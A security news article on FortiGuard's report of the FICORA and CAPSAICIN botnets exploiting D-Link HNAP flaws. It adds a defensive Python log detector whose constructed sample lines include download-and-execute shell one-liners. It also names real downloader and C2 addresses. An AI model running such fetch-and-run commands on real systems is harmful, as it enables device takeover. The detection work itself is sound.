Surge in Botnet Activity Targets D-Link Vulnerabilities: A Focus on FICORA and CAPSAICIN
December 27, 2024
FortiGuard Labs researchers have observed a sharp increase in activity from two botnets, FICORA and CAPSAICIN, variants of Mirai and Kaiten respectively. Both exploit vulnerabilities in D-Link devices through the Home Network Administration Protocol (HNAP) interface, which allows remote command execution. The vulnerabilities targeted include CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112.
Fortinet's report states: 'According to our IPS telemetry, attackers frequently reuse older attacks, which accounts for the continued spread of the “FICORA” and “CAPSAICIN” botnets to victim hosts and infected targets.' The FICORA botnet's recent campaign was spread across many regions, indicating that it was not aimed at specific targets, while the CAPSAICIN botnet showed high activity levels for two days in October 2024, predominantly in East Asian countries.
The FICORA botnet operates by downloading and executing a shell script known as 'multi,' which is subsequently removed post-execution. This script employs various methods to download the malware, including 'wget,' 'ftpget,' 'curl,' and 'tftp.' It first terminates processes with the same file extension as 'FICORA' before downloading and executing the malware targeting multiple Linux architectures. The malware's configuration, including its command and control (C2) server domain and a unique string, is encrypted using the ChaCha20 algorithm. The scanner utilized by the FICORA botnet comes with a hard-coded username and password for its brute force attack function.
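As an added illustration, not code from Fortinet's report or this article, the following Python sketch flags the fetch, run and delete chain described above in process-command log lines: a download attempted with one or more of wget, curl, tftp or ftpget, the fetched file executed, and the file removed afterwards. The log format, the cmd= field and the sample addresses are assumptions, and the sample lines are constructed.

```python
import re

# Download utilities the FICORA "multi" script is reported to try (from the article).
DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}
SHELLS = {"sh", "bash", "ash"}
STAGE_SPLIT = re.compile(r"\s*(?:\|\||&&|;|\|)\s*")  # split a one-liner into stages
CMD_FIELD = re.compile(r'cmd="(.*)"\s*$')            # assumed field in our constructed log format

# Constructed sample log lines (assumed syslog-like format; 203.0.113.x is a documentation range).
LOG_LINES = [
    'Dec 27 10:01:02 gw sh[1203]: cmd="wget http://203.0.113.10/multi -O /tmp/multi || curl -o /tmp/multi http://203.0.113.10/multi || tftp -g -r multi 203.0.113.10; sh /tmp/multi; rm -f /tmp/multi"',
    'Dec 27 10:03:15 gw sh[1240]: cmd="busybox wget http://203.0.113.10/x86 -O /tmp/x86; chmod +x /tmp/x86; /tmp/x86"',
    'Dec 27 10:05:44 gw sh[1250]: cmd="curl -s https://updates.example.com/version.json -o /var/run/version.json"',
    'Dec 27 10:07:10 gw sh[1301]: cmd="ls -la /tmp"',
]

def _basename(tok):
    return tok.rstrip("/").rsplit("/", 1)[-1]

def analyze_command(cmd):
    """Score one logged shell command for the fetch -> run -> delete pattern."""
    downloaders, fetched, executed, removed = [], set(), False, False
    for stage in STAGE_SPLIT.split(cmd):
        argv = stage.split()
        if len(argv) > 1 and _basename(argv[0]) == "busybox":
            argv = argv[1:]  # busybox applet: classify by the applet name
        if not argv:
            continue
        prog, args = _basename(argv[0]), argv[1:]
        names = {_basename(a) for a in args}
        if prog in DOWNLOADERS:
            downloaders.append(prog)
            # Any non-flag argument (URL path or -O target) may name the dropped file.
            fetched.update(_basename(a) for a in args if not a.startswith("-"))
        elif prog == "rm":
            removed = removed or bool(names & fetched)
        elif prog in SHELLS or prog == "chmod" or argv[0].startswith(("./", "/")):
            executed = executed or bool((names | {prog}) & fetched)
    severity = "none"
    if downloaders and executed:  # a fetched file was run; deletion or fallback downloaders raise it
        severity = "high" if removed or len(set(downloaders)) > 1 else "medium"
    return {"downloaders": downloaders, "executed": executed, "removed": removed, "severity": severity}

def scan_log(lines):
    """Return (line_number, analysis) for each log line whose command scores above 'none'."""
    results = [(n, analyze_command(m.group(1))) for n, line in enumerate(lines, 1) if (m := CMD_FIELD.search(line))]
    return [(n, r) for n, r in results if r["severity"] != "none"]
```

A routine package update that downloads without executing the file (third sample line) scores 'none', so the rule keys on the execution step rather than on the download tool alone.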
The CAPSAICIN botnet uses a downloader script ('bins.sh') hosted at a different IP address ('87.10.220[.]221') to fetch bots built for various Linux architectures. It kills known botnet processes so that it remains the only bot running on the device. It then connects to its C2 server ('192.110.247[.]46') and sends the victim's OS information and a unique nickname back to the server.
FortiGuard Labs concludes in their report that 'Although the weaknesses exploited in this attack had been exposed and patched nearly a decade ago, these attacks have remained continuously active worldwide... Because of this, it is crucial for every enterprise to regularly update the kernel of their devices and maintain comprehensive monitoring. These steps will help reduce the likelihood of malware being deployed through this vulnerability.'